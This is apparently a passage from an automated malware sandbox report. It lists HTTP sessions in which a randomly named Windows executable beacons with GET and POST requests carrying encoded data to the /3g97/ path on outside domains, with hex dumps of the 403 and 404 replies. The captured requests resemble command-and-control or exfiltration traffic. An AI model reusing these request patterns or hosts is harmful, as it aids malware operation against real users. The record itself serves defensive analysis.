uf0B2fZc7Oygtp1ubKLnkf97+bBytB6/GufvsHkV0roUdhRAtviFESBrDQFbFHUYQEKEV56+0/TOqyG7907avYA99GkURTNWLPbKG7HvCjSPa9Khb1UZ57gAx4Z+A7WjgPsmxFDt+JRd+s/XgaxYh//t96CLRMeVs+PegUrmp4Qim2LipzrTX6YL/Xk3GiVTv7qazfr4YQVGrVG+jS3ze20sD7y+KM0t52+FH5oN469VMC5hWzd2LZLq15J/oNJgI+NyF3fG9nc8a9niHYMQ2osmFQUtQ9E8UmPThz+wGO52sVu/pH1f2Y+4RUA5EW27tEyWTb8TIU7cMv8NFHu1eQ5p0EFdF5yprN9XbQoAW8Js1Sg3k0Q/N5ICmTKpNd62rJRwa1Cu1CUrTPAutZIbXXYuvbG0JFuLTtUzvZ/yQCHJzNmViDqLBKTDIIyOyJi9j1ts3E45kXyIiRUCi8v3A0FgPtv33bqquUoC2GNfp/IHyM7Lu4by2Eh1hgL6kN/njRVCigAGUQaHBDbd5l+YpSGi1qYSxeQqZutO0M+x9Si375MghXzbVVmVAf790BllJ3uFfrMB0fiP3BWGkg6S4/Qiza85Ing71qWoJA3Tj2rufcPyRxQ2jrHt7pAnDVigwOCo2pLAHOMbA/ZViRQDW1GDPcAeMYX8ezrYuEaV8NIZDv6RXZhV7jvzZ66N9cUVAoIunITy/s0jMT/Ne+LuEqpmyE+Ouxt2+Whfu90yCnXL1N9nnSTY8FDqMQltWgwIcGE05QO6230GbrXpJszvki0WbpY9vTKBL0AFZkMTfL/jyUxMcZlgM+mrqPubTLoPiLMVF/03ME9y13BVJiMDwg7CqwSA1FKPwVYiPlaIhetIPQ26OxwNqDGXHLdSAMoILNMQkgQHMZ6/MICN0x5JGyQO85SgLtFDqdUXRFbSh7puwmoW41zlnbVdFe6VnXttVgA6DAh3SZpMLRXEQYimBpjZ+zk93Fj0UWPaksqAhudGJS6aAzJ3Zd1vE3WOViwTmeDqtMDGPcwkUjUhFyxkDYhQ52HKYiDRNyoWdn2dipeh/McY3rBrOsgBtNgC6JlGkJvVJLLFqr3ha++kPPSy+mRxFTBGSXCL7zA337zIPpwgTUCE0bZgqkXfOMe996PxjWylVdbL2Y1c1IBLBRMTw8iBww0w0cNRUjzKJm7ARrczo+BCm7TScyBkLuAM5fHFkvCfreD6UcVcsCxbWcnsUIH6Njyo5vybT3lQWnk5WxMQ3Xf3ZXejSz2pLrF+GaQ6av98RTC3SFnJVy2TmbAd0LoqWZEE33XGNT0rRmSX4cM8EcPALeysQTLDXyP/Y6hv+fj2WFGImqaqtBI5lgFeqdyk2OAHBZyP50d3NWrv0zIhniRpkmgQHedvJdLwSaXvC6K9M813n7yoRn31g3JWHKZiAAFbzgRixMy54y3f2xryB9nVYf5s+f2mNBloHspLuG+M3I6jaFcdkcBBp2cb9SqpPcbcQa9uINO5Ah6RlC/7pclcA7EzDw1QtzQJV6R1gmhJgqZxzKmVbNL26skAzhglV/i2dE7UzrSqw+zFySd7PLW9totK0Bc05iY6Bg6+Y7WIjiBsdqLIWAtGyk0vxw8axK/Ps1axqoTvN/B8lK5XkNXu4pba/WfUNX+Fcf146N/WH/yWcc3LfZA4/M5X+GwtRp07mlQX34h6v0iyoHnQBcChlh/lgb9hiTfBzDdjPRPE8Y7i49OjbSR+TzSEsaSJmCmM5GyUQG3PRJj1L3ygwGc67Or08+ifjpT+Z9jUG6pJOKJbufKmUHO2QjnI3lcUuypmTSTsM19wsdrubI/Bh8Bx+
                                                                                              Apr 24, 2024 07:28:09.008766890 CEST377INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Wed, 24 Apr 2024 05:28:08 GMT
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              28192.168.2.449769118.27.122.214801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:28:11.543102026 CEST457OUTGET /3g97/?AlB=sdJPX&12l42=NDJWYY+b4MJOe0SOZhyP3/gD5HDsZQ87d1VJjuxPOAPtwNnLRfPhezVGmkxSEIZ/YXBHCU3m0ogYj5Dd6IJsMpuoncQuveGk65BlZhCiT7/R0prs9m7zKG0= HTTP/1.1
                                                                                              Host: www.kansaiwoody.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Apr 24, 2024 07:28:11.818558931 CEST359INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Wed, 24 Apr 2024 05:28:11 GMT
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              29192.168.2.44977034.149.87.45801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:28:17.312788010 CEST743OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.corvidemporium.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.corvidemporium.com
                                                                                              Referer: http://www.corvidemporium.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 38 52 65 4e 6f 66 65 39 45 76 41 65 4d 36 4a 62 58 68 54 34 43 47 43 52 72 59 47 75 39 54 39 68 37 7a 53 6c 4b 77 33 78 73 41 34 49 79 45 36 48 4d 65 55 35 47 53 61 33 51 5a 30 69 61 35 64 6f 68 43 30 7a 47 59 53 64 5a 66 39 7a 6a 75 55 68 61 4d 78 4b 38 67 4b 6e 53 59 42 47 4d 47 73 37 39 69 38 53 61 43 56 67 70 66 6a 41 6b 6d 37 70 6d 48 44 2f 63 52 4b 47 66 62 79 38 31 6f 6c 32 6f 43 5a 52 6f 37 4e 54 64 56 41 48 62 4a 35 4e 47 56 63 59 77 51 51 43 66 73 44 30 6b 44 78 6c 65 36 50 79 44 78 64 32 2b 78 7a 74 54 69 79 35 54 4e 54 4d 2b 4b 6c 30 2f 38 58 38 74 72 69 72 76 67 3d 3d
                                                                                              Data Ascii: 12l42=8ReNofe9EvAeM6JbXhT4CGCRrYGu9T9h7zSlKw3xsA4IyE6HMeU5GSa3QZ0ia5dohC0zGYSdZf9zjuUhaMxK8gKnSYBGMGs79i8SaCVgpfjAkm7pmHD/cRKGfby81ol2oCZRo7NTdVAHbJ5NGVcYwQQCfsD0kDxle6PyDxd2+xztTiy5TNTM+Kl0/8X8trirvg==
                                                                                              Apr 24, 2024 07:28:17.518404961 CEST1078INHTTP/1.1 403 Forbidden
                                                                                              Content-Length: 548
                                                                                              Content-Type: text/html
                                                                                              Server: Pepyaka
                                                                                              X-Wix-Request-Id: 1713936497.4153491690962646761
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Accept-Ranges: bytes
                                                                                              Date: Wed, 24 Apr 2024 05:28:17 GMT
                                                                                              X-Served-By: cache-bur-kbur8200132-BUR
                                                                                              X-Cache: MISS
                                                                                              X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb7CuzCCL+dj8TnMJldQo94o
                                                                                              Via: 1.1 google
                                                                                              glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              30192.168.2.44977134.149.87.45801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:28:20.015732050 CEST763OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.corvidemporium.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.corvidemporium.com
                                                                                              Referer: http://www.corvidemporium.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 38 52 65 4e 6f 66 65 39 45 76 41 65 4d 62 35 62 56 47 6e 34 45 6d 43 53 31 6f 47 75 33 7a 39 36 37 7a 57 6c 4b 78 44 59 74 7a 4d 49 79 68 65 48 65 76 55 35 4c 79 61 33 62 35 30 72 58 5a 64 56 68 43 34 37 47 61 57 64 5a 66 70 7a 6a 75 45 68 61 39 78 4a 36 77 4b 68 5a 34 42 41 42 6d 73 37 39 69 38 53 61 43 42 61 70 66 37 41 6b 56 7a 70 6d 6a 66 77 43 42 4b 4a 61 62 79 38 6e 59 6c 79 6f 43 5a 7a 6f 2b 55 32 64 58 6f 48 62 4c 78 4e 47 6e 6b 62 6c 67 52 4a 52 4d 43 69 73 44 42 6f 65 35 71 44 4e 52 56 77 6e 67 43 50 62 45 6a 6a 43 38 79 62 73 4b 42 48 69 37 65 49 67 6f 66 69 30 6e 55 35 74 47 7a 64 70 6a 57 6e 4b 66 45 75 33 39 4a 54 4d 49 67 3d
                                                                                              Data Ascii: 12l42=8ReNofe9EvAeMb5bVGn4EmCS1oGu3z967zWlKxDYtzMIyheHevU5Lya3b50rXZdVhC47GaWdZfpzjuEha9xJ6wKhZ4BABms79i8SaCBapf7AkVzpmjfwCBKJaby8nYlyoCZzo+U2dXoHbLxNGnkblgRJRMCisDBoe5qDNRVwngCPbEjjC8ybsKBHi7eIgofi0nU5tGzdpjWnKfEu39JTMIg=
                                                                                              Apr 24, 2024 07:28:20.231172085 CEST1079INHTTP/1.1 403 Forbidden
                                                                                              Content-Length: 548
                                                                                              Content-Type: text/html
                                                                                              Server: Pepyaka
                                                                                              X-Wix-Request-Id: 1713936500.12634899652302646765
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Accept-Ranges: bytes
                                                                                              Date: Wed, 24 Apr 2024 05:28:20 GMT
                                                                                              X-Served-By: cache-bur-kbur8200098-BUR
                                                                                              X-Cache: MISS
                                                                                              X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,9WD8GAcpJgs/Ng1WkD2i0h9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb7CuzCCL+dj8TnMJldQo94o
                                                                                              Via: 1.1 google
                                                                                              glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              31192.168.2.44977234.149.87.45801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:28:22.721571922 CEST10845OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.corvidemporium.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.corvidemporium.com
                                                                                              Referer: http://www.corvidemporium.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 38 52 65 4e 6f 66 65 39 45 76 41 65 4d 62 35 62 56 47 6e 34 45 6d 43 53 31 6f 47 75 33 7a 39 36 37 7a 57 6c 4b 78 44 59 74 7a 55 49 79 7a 57 48 4d 38 4d 35 4b 79 61 33 48 70 30 75 58 5a 64 45 68 43 51 2f 47 61 4b 4e 5a 64 52 7a 69 4e 38 68 63 4a 46 4a 30 77 4b 68 57 59 42 42 4d 47 74 35 39 6a 4d 4e 61 43 52 61 70 66 37 41 6b 55 6a 70 68 33 44 77 41 42 4b 47 66 62 79 4b 31 6f 6c 57 6f 43 42 4a 6f 2b 68 44 64 6d 49 48 59 6f 5a 4e 56 6b 63 62 6e 41 52 4c 57 4d 43 71 73 44 4d 6f 65 35 33 38 4e 51 52 57 6e 67 32 50 5a 41 37 34 56 39 4b 53 2b 4d 52 4f 33 62 2b 62 68 6f 7a 4a 78 42 30 44 70 6b 72 30 79 51 66 45 4d 50 6f 6e 76 75 42 50 66 34 53 6f 67 74 48 67 2b 2b 56 63 71 79 6b 57 69 45 4e 6b 39 69 51 55 41 73 6f 6c 52 45 72 2f 33 4f 56 71 4b 63 7a 44 62 47 45 61 32 31 2b 2f 74 4e 39 4d 62 36 6f 64 4e 75 72 5a 74 35 53 68 31 59 33 51 54 6e 49 49 67 36 63 2b 71 79 6d 65 6a 74 58 66 33 31 6d 4a 58 42 50 49 4f 45 61 42 6e 59 4f 46 38 6c 45 76 52 44 6c 75 6e 43 79 77 59 67 34 35 77 76 46 46 36 54 43 58 2f 6a 59 32 4d 30 53 76 50 76 50 62 62 63 2b 76 72 7a 58 33 67 55 6a 53 63 46 77 48 6a 66 69 70 67 39 6b 5a 6d 64 6e 6d 68 79 50 2b 34 4b 74 2f 6d 50 6b 41 30 39 6a 39 58 49 36 72 44 46 37 4f 77 37 6e 74 39 73 47 4f 6d 4a 44 53 43 44 41 61 55 70 78 78 30 58 2b 48 49 48 75 4e 7a 65 52 38 76 7a 71 47 6a 43 37 38 6f 61 53 4f 49 49 77 76 65 4a 76 73 68 30 33 62 48 45 32 79 4e 5a 33 53 4b 44 36 73 6a 68 31 45 75 51 52 36 68 45 6c 31 7a 6a 4d 75 6c 6f 72 31 66 4a 2b 43 2b 51 2b 43 31 45 47 41 78 43 70 43 5a 53 45 75 68 74 65 6e 33 78 7a 5a 6a 46 2f 4b 66 73 68 55 68 43 4c 7a 6d 58 35 53 6a 55 69 74 6b 79 52 71 4d 54 65 78 34 57 49 46 31 53 76 46 4a 4b 32 57 76 31 44 70 52 6d 39 68 32 6a 71 75 6f 49 61 7a 70 77 4c 67 77 68 34 33 63 41 55 44 75 4e 2f 79 4b 34 54 72 4d 39 58 4e 77 58 62 4e 69 34 71 65 49 37 54 68 68 6f 33 55 6d 71 48 74 72 45 4d 67 47 4c 78 63 56 41 67 5a 36 43 6c 34 77 49 6c 7a 53 33 63 31 77 30 32 57 62 6e 76 55 2f 2f 48 37 73 49 34 77 4a 74 34 34 4f 4d 6c 44 4d 69 68 33 32 47 6b 57 48 5a 30 72 33 72 63 41 64 67 4d 55 5a 49 78 4e 37 2f 57 67 33 4c 36 44 45 77 41 46 38 65 71 46 72 4c 39 50 2b 46 65 52 30 6a 65 51 69 65 4d 6c 56 51 65 63 72 32 51 31 42 35 68 48 42 4d 6c 2f 55 4f 58 51 43 72 67 47 6d 6e 48 56 6f 51 48 55 6b 6b 35 75 6b 45 71 63 72 4c 74 45 51 54 77 44 76 68 75 79 32 6c 2b 2f 45 79 66 4b 4f 47 41 38 4b 38 46 6c 69 6b 35 4e 56 41 34 75 42 34 6b 37 66 61 47 57 30 32 64 5a 67 66 2f 66 48 6d 49 55 45 49 32 6a 41 5a 49 45 51 37 50 71 71 79 31 2b 78 75 44 2b 32 66 6c 5a 6b 75 46 4b 46 47 6a 32 64 44 63 48 48 65 61 76 4b 71 35 33 56 68 63 4c 50 38 4d 65 52 37 64 4e 43 50 4a 6e 49 6b 53 42 73 38 2f 69 4a 2f 49 58 61 7a 68 33 78 31 73 54 58 76 38 44 7a 49 4a 50 69 4b 41 4c 2f 56 4e 55 75 68 45 4f 62 65 42 47 6b 73 69 45 73 51 68 6a 6d 67 66 66 4f 43 4c 4e 38 61 50 33 73 51 77 51 67 61 30 5a 70 2f 61 6d 63 33 64 55 50 6f 6a 49 43 5a 55 65 61 4a 6b 46 50 62 32 67 64 67 4f 38 77 6c 4d 4c 74 72 41 34 75 66 33 76 68 55 4d 70 7a 68 72 4d 68 61 74 4f 4f 45 51 32 57 62 53 46 64 36 36 58 35 76 67 57 32 67 66 6b 67 2b 74 6b 6b 4f 2f 4a 76 34 4f 66 6b 55 46 54 4e 62 61 38 73 58 36 77 42 30 50 4c 6a 4b 6d 76 6d 65 46 67 53 70 48 4e 6a 59 4a 44 61 35 64 54 6b 63 48 4d 6b 71 67 77 35 78 77 6f 63 72 44 52 6c 36 7a 37 72 71 74 6e 76 63 2b 73 5a 43 53 52 65 67 37 46 39 79 72 70 7a 31 52 4f 6e 51 6e 49 62 39 79 7a 38 37 66 4b 4d 37 68 4c 34 6a 7a 72 74 54 57 78 65 69 4b 75 69 43 75 72 2f 4d 56 46 77 64 41 71 45 33 42 33 34 76 4c 65 71 6c 48 32 43 36 70 6e 30 74 58 74 6e 4a 51 6d 70 50 6f 79 76 6d 30 59 4f 6a 62 68 41 32 48 6e 45 57 39 37 4f 32 76 34 69 4a 4f 79 44 32 31 6b 5a 6c 4a 73 43 2f 56 2f 31 49 58 77 39 36 65 77 32 49 52 37 32 30 61 66 6a 63 69 43 72 44 53 69 4f 48 42 36 6e 2f 56 32 42 2f 4f 39 5a 34 42 76 6d 70 71 6e 65 4a 56 6b 4e 47 35 32 42 39 4f 52 68 65 2f 57 44 74 30 76 32 78 4e 75 4e 47 39 69 63 4f 6e 57 47 69 6c 61 74 64 6c 47 74 61 6e 72 76 45 67 4d 58 30 2f 6a 30 74 73 50 66 6b 4e 65 58 54 4c 70 6a 54 6d 62 73 38 4e 68 53 35 68 73 6b 74 62 35 61 4f 7a 50 32 75 37 41 70 31 62 70 68 2b 53 66 6b
                                                                                              Data Ascii: 12l42=8ReNofe9EvAeMb5bVGn4EmCS1oGu3z967zWlKxDYtzUIyzWHM8M5Kya3Hp0uXZdEhCQ/GaKNZdRziN8hcJFJ0wKhWYBBMGt59jMNaCRapf7AkUjph3DwABKGfbyK1olWoCBJo+hDdmIHYoZNVkcbnARLWMCqsDMoe538NQRWng2PZA74V9KS+MRO3b+bhozJxB0Dpkr0yQfEMPonvuBPf4SogtHg++VcqykWiENk9iQUAsolREr/3OVqKczDbGEa21+/tN9Mb6odNurZt5Sh1Y3QTnIIg6c+qymejtXf31mJXBPIOEaBnYOF8lEvRDlunCywYg45wvFF6TCX/jY2M0SvPvPbbc+vrzX3gUjScFwHjfipg9kZmdnmhyP+4Kt/mPkA09j9XI6rDF7Ow7nt9sGOmJDSCDAaUpxx0X+HIHuNzeR8vzqGjC78oaSOIIwveJvsh03bHE2yNZ3SKD6sjh1EuQR6hEl1zjMulor1fJ+C+Q+C1EGAxCpCZSEuhten3xzZjF/KfshUhCLzmX5SjUitkyRqMTex4WIF1SvFJK2Wv1DpRm9h2jquoIazpwLgwh43cAUDuN/yK4TrM9XNwXbNi4qeI7Thho3UmqHtrEMgGLxcVAgZ6Cl4wIlzS3c1w02WbnvU//H7sI4wJt44OMlDMih32GkWHZ0r3rcAdgMUZIxN7/Wg3L6DEwAF8eqFrL9P+FeR0jeQieMlVQecr2Q1B5hHBMl/UOXQCrgGmnHVoQHUkk5ukEqcrLtEQTwDvhuy2l+/EyfKOGA8K8Flik5NVA4uB4k7faGW02dZgf/fHmIUEI2jAZIEQ7Pqqy1+xuD+2flZkuFKFGj2dDcHHeavKq53VhcLP8MeR7dNCPJnIkSBs8/iJ/IXazh3x1sTXv8DzIJPiKAL/VNUuhEObeBGksiEsQhjmgffOCLN8aP3sQwQga0Zp/amc3dUPojICZUeaJkFPb2gdgO8wlMLtrA4uf3vhUMpzhrMhatOOEQ2WbSFd66X5vgW2gfkg+tkkO/Jv4OfkUFTNba8sX6wB0PLjKmvmeFgSpHNjYJDa5dTkcHMkqgw5xwocrDRl6z7rqtnvc+sZCSReg7F9yrpz1ROnQnIb9yz87fKM7hL4jzrtTWxeiKuiCur/MVFwdAqE3B34vLeqlH2C6pn0tXtnJQmpPoyvm0YOjbhA2HnEW97O2v4iJOyD21kZlJsC/V/1IXw96ew2IR720afj